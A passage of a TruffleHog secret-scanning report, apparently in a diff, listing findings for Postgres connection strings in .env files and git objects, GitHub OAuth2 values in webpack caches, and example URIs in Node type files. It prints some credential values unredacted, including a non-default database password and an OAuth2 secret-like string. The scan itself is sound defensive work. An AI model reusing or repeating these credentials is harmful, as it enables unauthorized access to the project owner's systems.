secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.env.local + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 48b308b8dd5acde8 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.env.docker.dev + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.env.docker.dev + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1c16bda367ac0bd8 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.env.docker.test + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.env.docker.test + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: deeba988a9ab6141 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 381c867d67edf2e8 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208 + startLine: 0 + message: postgresql://postgres:change-me@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208 + line: 7 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:change-me@postgres:5432 + RawV2: postgresql://postgres:change-me@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: edccc43a23cfabf6 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14 + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14 + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aae1f539799fb2de + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06 + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06 + line: 1 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:password@postgres:5432 + RawV2: postgresql://postgres:password@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 786bfda631317a71 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924 + startLine: 0 + message: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924 + line: 7 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 + RawV2: postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 595d2f235b05e737 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc + startLine: 0 + message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc + line: 9 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3ed146267f450c31 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c + startLine: 0 + message: postgresql://postgres:change-me@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c + line: 7 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:change-me@postgres:5432 + RawV2: postgresql://postgres:change-me@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2998e9823a9a5e07 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46 + startLine: 0 + message: postgresql://postgres:change-me@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46 + line: 10 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: true + Raw: postgresql://postgres:change-me@postgres:5432 + RawV2: postgresql://postgres:change-me@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d6855b7ba77520b3 + ruleId: GitHubOauth2 + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz + startLine: 0 + message: 52813b1d8ad9af510d85 + title: GitHubOauth2 secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz + line: 10674 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 924 + DetectorName: GitHubOauth2 + DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize + applications to access GitHub's API on behalf of a user or organization. These + credentials include a client ID and client secret, which can be used to obtain + access tokens for accessing GitHub resources. + DecoderName: BASE64 + Verified: false + VerificationFromCache: false + Raw: 52813b1d8ad9af510d85 + RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/github/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 437a1c93140bc172 + ruleId: GitHubOauth2 + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz + startLine: 0 + message: 52813b1d8ad9af510d85 + title: GitHubOauth2 secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz + line: 9955 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 924 + DetectorName: GitHubOauth2 + DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize + applications to access GitHub's API on behalf of a user or organization. These + credentials include a client ID and client secret, which can be used to obtain + access tokens for accessing GitHub resources. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: 52813b1d8ad9af510d85 + RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/github/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7029ffbb2c18937d + ruleId: GitHubOauth2 + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz + startLine: 0 + message: 52813b1d8ad9af510d85 + title: GitHubOauth2 secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz + line: 6254 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 924 + DetectorName: GitHubOauth2 + DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize + applications to access GitHub's API on behalf of a user or organization. These + credentials include a client ID and client secret, which can be used to obtain + access tokens for accessing GitHub resources. + DecoderName: BASE64 + Verified: false + VerificationFromCache: true + Raw: 52813b1d8ad9af510d85 + RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/github/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 992176a363e3d8a9 + ruleId: GitHubOauth2 + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack + startLine: 0 + message: 52813b1d8ad9af510d85 + title: GitHubOauth2 secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/apps/dashboard/.next/cache/webpack/server-production/0.pack + line: 245909 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 924 + DetectorName: GitHubOauth2 + DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize + applications to access GitHub's API on behalf of a user or organization. These + credentials include a client ID and client secret, which can be used to obtain + access tokens for accessing GitHub resources. + DecoderName: PLAIN + Verified: false + VerificationFromCache: true + Raw: 52813b1d8ad9af510d85 + RawV2: 52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/github/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c1bd932c91cd4cda + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/@types/node/http.d.ts + startLine: 0 + message: http://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/@types/node/http.d.ts + line: 1790 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: http://abc:xyz@example.com + RawV2: http://abc:xyz@example.com + Redacted: http://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 65c35953dedc7b57 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/@types/node/https.d.ts + startLine: 0 + message: https://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/@types/node/https.d.ts + line: 428 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: https://abc:xyz@example.com + RawV2: https://abc:xyz@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f081eac965f118df + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://123:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/@types/node/url.d.ts + line: 722 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: https://123:xyz@example.com + RawV2: https://123:xyz@example.com + Redacted: https://123:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a18230c14354e278 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://abc:xyz@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/@types/node/url.d.ts + line: 716 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: https://abc:xyz@example.com + RawV2: https://abc:xyz@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f03f52d67f2ae961 + ruleId: URI + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/@types/node/url.d.ts + startLine: 0 + message: https://abc:123@example.com + title: URI secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/@types/node/url.d.ts + line: 557 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 17 + DetectorName: URI + DetectorDescription: This detector identifies URLs with embedded credentials, + which can be used to access web resources without explicit user interaction. + DecoderName: PLAIN + Verified: false + VerificationFromCache: false + Raw: https://abc:123@example.com + RawV2: https://abc:123@example.com + Redacted: https://abc:********@example.com + ExtraData: null + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: 